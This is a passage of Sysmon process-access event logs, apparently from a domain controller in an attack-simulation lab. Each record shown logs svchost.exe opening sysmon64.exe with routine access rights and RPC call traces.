C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:23.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:23.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 